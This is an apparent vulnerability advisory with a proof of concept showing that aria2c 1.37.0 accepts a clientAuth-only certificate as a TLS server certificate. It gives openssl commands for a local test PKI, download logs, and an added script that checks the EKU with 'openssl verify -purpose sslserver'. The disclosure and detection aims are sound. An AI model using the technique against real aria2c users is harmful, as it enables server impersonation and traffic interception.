    aria2c Improper Certificate Validation – Research Advisory

    By admin, May 13, 2026


    Tenable Research discovered that aria2c accepts a server certificate whose Extended Key Usage (EKU) extension does not permit TLS server authentication. An attacker who obtains a certificate and its private key that were issued for a different purpose, for example client authentication, can present it to aria2c as a server certificate: the EKU restriction that should confine a certificate to the purpose it was issued for is not enforced.

    Proof of Concept

    In this PoC we generate private keys and the corresponding X.509 certificates, configure a TLS server to use them, and show that aria2c does not reject a certificate that is not meant for TLS server authentication. In a real attack, the attacker would instead reuse a compromised certificate and its private key.


    Generate a set of RSA keys:

    openssl genrsa -out ca-key.pem 2048

    openssl genrsa -out server-key.pem 2048

     

    Create an OpenSSL config:

    cat openssl-ca.cfg
    [ ca ]
    keyUsage                = critical,digitalSignature,keyCertSign,cRLSign
    extendedKeyUsage        = serverAuth,clientAuth
    basicConstraints        = critical,CA:TRUE
    subjectKeyIdentifier    = hash
    authorityKeyIdentifier  = keyid:always

    [ server ]
    keyUsage                = critical,digitalSignature
    extendedKeyUsage        = serverAuth
    basicConstraints        = critical,CA:FALSE
    subjectKeyIdentifier    = hash
    authorityKeyIdentifier  = keyid:always

    [ server-bad-eku ]
    keyUsage                = critical,digitalSignature
    extendedKeyUsage        = clientAuth
    basicConstraints        = critical,CA:FALSE
    subjectKeyIdentifier    = hash
    authorityKeyIdentifier  = keyid:always


    Generate the root CA certificate:

    openssl req -x509 -new -key ca-key.pem -days 365 -out ca-cert.pem -subj "/CN=TestCA" -config openssl-ca.cfg -extensions ca

    Generate a certificate signing request (the subjectAltName is carried in the CSR):

    openssl req -new -key server-key.pem -out server.csr -subj "/CN=server" -addext "subjectAltName = DNS:localhost"


    Generate a valid server certificate (-copy_extensions copies the subjectAltName from the CSR into the certificate; this option requires OpenSSL 3.x):

    openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server -copy_extensions copyall


    Check the EKU of the generated certificate:

    openssl x509 -text -noout -in server-cert.pem | grep -i 'Extended Key Usage' -A1
                X509v3 Extended Key Usage: 
                    TLS Web Server Authentication


    Generate an invalid server certificate with an incorrect EKU (clientAuth only):

    openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-bad-eku-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server-bad-eku -copy_extensions copyall

    Check the EKU of the generated certificate:

    openssl x509 -text -noout -in server-bad-eku-cert.pem | grep -i 'Extended Key Usage' -A1
                X509v3 Extended Key Usage: 
                    TLS Web Client Authentication


    Start a server using the valid server certificate:

    openssl s_server -key server-key.pem -cert server-cert.pem -www -port 8080

    The connection succeeds, as expected:

    aria2c --ca-certificate=ca-cert.pem https://localhost:8080

    04/30 18:14:37 [NOTICE] Downloading 1 item(s)

    04/30 18:14:37 [NOTICE] Download complete: /home/parallels/aria2c/index.html

    Download Results:
    gid   |stat|avg speed  |path/URI
    ======+====+===========+=======================================================
    9bf002|OK  |   588KiB/s|/home/parallels/aria2c/index.html

    Status Legend:
    (OK):download completed.


    Start a server using the server certificate with the incorrect EKU:

    openssl s_server -key server-key.pem -cert server-bad-eku-cert.pem -www -port 8080

    The connection succeeds when it should not: the certificate is only valid for client authentication, yet aria2c accepts it as a server certificate:

    aria2c --ca-certificate=ca-cert.pem https://localhost:8080

    04/30 18:14:57 [NOTICE] Downloading 1 item(s)

    04/30 18:14:57 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.1.html.

    04/30 18:14:57 [NOTICE] Download complete: /home/parallels/aria2c/index.1.html

    Download Results:
    gid   |stat|avg speed  |path/URI
    ======+====+===========+=======================================================
    c6e101|OK  |   673KiB/s|/home/parallels/aria2c/index.1.html

    Status Legend:
    (OK):download completed.

    aria2c verifies peer certificates by default (--check-certificate defaults to true), so enabling the option explicitly makes no difference; the download still succeeds:

    aria2c --ca-certificate=ca-cert.pem --check-certificate https://localhost:8080

    04/30 18:15:07 [NOTICE] Downloading 1 item(s)

    04/30 18:15:07 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.2.html.

    04/30 18:15:07 [NOTICE] Download complete: /home/parallels/aria2c/index.2.html

    Download Results:
    gid   |stat|avg speed  |path/URI
    ======+====+===========+=======================================================
    686fe6|OK  |   786KiB/s|/home/parallels/aria2c/index.2.html

    Status Legend:
    (OK):download completed.

    aria2c --ca-certificate=ca-cert.pem --check-certificate=true https://localhost:8080

    04/30 18:15:14 [NOTICE] Downloading 1 item(s)

    04/30 18:15:14 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.3.html.

    04/30 18:15:14 [NOTICE] Download complete: /home/parallels/aria2c/index.3.html

    Download Results:
    gid   |stat|avg speed  |path/URI
    ======+====+===========+=======================================================
    4a4aec|OK  |   786KiB/s|/home/parallels/aria2c/index.3.html

    Status Legend:
    (OK):download completed.


    Version of aria2c tested, on Ubuntu 24.04:

    aria2c --version | head -n 1
    aria2 version 1.37.0

    Other versions may be vulnerable too, but we have not validated additional versions.
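    The procedure above can be reproduced end to end and then checked the way a conforming TLS client checks a server certificate. The script below is an added example written for this page; it is not part of Tenable's advisory or of the aria2 project. It rebuilds the same CA, the serverAuth leaf and the clientAuth-only leaf in a scratch directory (the subjectAltName is put in the extension sections rather than in the CSR, so neither -addext nor -copy_extensions is needed and the commands run on OpenSSL 1.1.1 as well as 3.x), then asks openssl verify -purpose sslserver whether each leaf is fit for TLS server authentication. The TestCA/server subjects, the file names and the $WORK directory are arbitrary choices made here; openssl on PATH is assumed.

```shell
#!/bin/sh
# Added example for this page (not Tenable's PoC, not aria2 code).
# Rebuilds the advisory's test PKI in a scratch directory and applies the
# EKU check that a TLS client must perform. Assumes: openssl (1.1.1 or 3.x)
# on PATH. The CN values, file names and $WORK location are arbitrary.
set -eu

WORK=${WORK:-$(mktemp -d)}
CFG="$WORK/openssl-ca.cfg"

# Extension profiles, matching the advisory's config. The SAN lives in the
# leaf sections (instead of the CSR via -addext/-copy_extensions) so the same
# commands work on OpenSSL 1.1.1 and 3.x. [ req ]/[ dn ] exist only so that
# `req -config` accepts the file when the subject is supplied with -subj.
write_config() {
    cat > "$CFG" <<'EOF'
[ req ]
distinguished_name     = dn
[ dn ]

[ ca ]
keyUsage               = critical,digitalSignature,keyCertSign,cRLSign
extendedKeyUsage       = serverAuth,clientAuth
basicConstraints       = critical,CA:TRUE
subjectKeyIdentifier   = hash
authorityKeyIdentifier = keyid:always

[ server ]
keyUsage               = critical,digitalSignature
extendedKeyUsage       = serverAuth
basicConstraints       = critical,CA:FALSE
subjectAltName         = DNS:localhost
subjectKeyIdentifier   = hash
authorityKeyIdentifier = keyid:always

[ server-bad-eku ]
keyUsage               = critical,digitalSignature
extendedKeyUsage       = clientAuth
basicConstraints       = critical,CA:FALSE
subjectAltName         = DNS:localhost
subjectKeyIdentifier   = hash
authorityKeyIdentifier = keyid:always
EOF
}

# Root CA, one CSR, and two leaves issued from that CSR:
# server-cert.pem (EKU serverAuth) and server-bad-eku-cert.pem (EKU clientAuth).
build_pki() {
    write_config
    openssl genrsa -out "$WORK/ca-key.pem" 2048 2>/dev/null
    openssl genrsa -out "$WORK/server-key.pem" 2048 2>/dev/null
    openssl req -x509 -new -key "$WORK/ca-key.pem" -days 365 -subj "/CN=TestCA" \
        -config "$CFG" -extensions ca -out "$WORK/ca-cert.pem"
    openssl req -new -key "$WORK/server-key.pem" -subj "/CN=server" \
        -config "$CFG" -out "$WORK/server.csr"
    for profile in server server-bad-eku; do
        openssl x509 -req -in "$WORK/server.csr" -CA "$WORK/ca-cert.pem" \
            -CAkey "$WORK/ca-key.pem" -CAcreateserial -days 365 \
            -extfile "$CFG" -extensions "$profile" \
            -out "$WORK/$profile-cert.pem" 2>/dev/null
    done
}

# Print the EKU purposes of a certificate as OpenSSL names them
# (e.g. "TLS Web Client Authentication"); prints nothing if the extension is absent.
cert_eku() {
    openssl x509 -noout -text -in "$1" |
        awk '/X509v3 Extended Key Usage/ { getline; sub(/^[ \t]+/, ""); print; exit }'
}

# Exit 0 only if the certificate chains to the test CA AND is fit for the TLS
# server role: -purpose sslserver rejects a leaf whose EKU omits serverAuth with
# "unsupported certificate purpose". This is the check aria2c 1.37.0 skips.
verify_for_server() {
    openssl verify -CAfile "$WORK/ca-cert.pem" -purpose sslserver "$1" >/dev/null 2>&1
}

build_pki
for profile in server server-bad-eku; do
    cert="$WORK/$profile-cert.pem"
    if verify_for_server "$cert"; then
        echo "$profile-cert.pem  EKU: $(cert_eku "$cert")  -> accepted for TLS server authentication"
    else
        echo "$profile-cert.pem  EKU: $(cert_eku "$cert")  -> rejected (unsupported certificate purpose)"
    fi
done
```

    Running the script prints one line per certificate: the serverAuth leaf is accepted and the clientAuth-only leaf is rejected, because -purpose sslserver applies the rule a client's chain validation should apply to the role it is verifying (if the leaf carries an EKU extension, that extension must include serverAuth). The same rule can be exercised against a live listener such as the s_server from the PoC with openssl s_client -connect localhost:8080 -CAfile ca-cert.pem -verify_return_error, which aborts the handshake on the bad certificate where aria2c 1.37.0 completes the download.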


